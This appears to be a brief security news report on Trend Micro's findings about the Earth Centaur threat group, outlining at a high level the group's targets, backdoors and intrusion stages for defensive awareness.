Long-term monitoring of the Earth Centaur group has revealed additional information regarding its tools and techniques. It was found targeting transportation firms and government agencies related to or associated with transportation.
What was discovered?
Trend Micro has been monitoring the group’s activities for a long time and now, which has culminated in detailed insights as follows.
The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks.
The threat actor possesses ample experience in red teamwork and skills to bypass security settings and continue uninterrupted.
Based on the victim’s infrastructure, the group uses backdoors with different protocols and reverse proxy to avoid network security systems.
The group uses open-source frameworks, as well, to efficiently develop new backdoor variants.
The infection chain
The intrusion process used by Earth Centaur can be divided into multiple stages such as entry point, first stage, second stage, and post-exploitation.
For an entry point, the group uses ProxyLogon exploits, web shells, and bitsadmin tools to download the first-stage loader (detected as Nerapack), along with the payload file (.bin).
In the second stage, they use multiple backdoors (ChiserClient, HTShell, Customized Lilith and Gh0st, SmileSvr) for communication using common network protocols.
It means that the group can bypass network security systems by using common protocols.
In the post-exploitation phase, the threat actor uses multiple hacking tools (e.g. SharpHound, RClone) to find and target machines on the victim’s intranet.
The recently observed activities of the Earth Centaur group could be just the tip of the iceberg in comparison to their vast operations, opine experts. However, the shared information may allow for a better understanding of how a threat enters and operates within a victim’s network. Thus, more effective security measures can be implemented.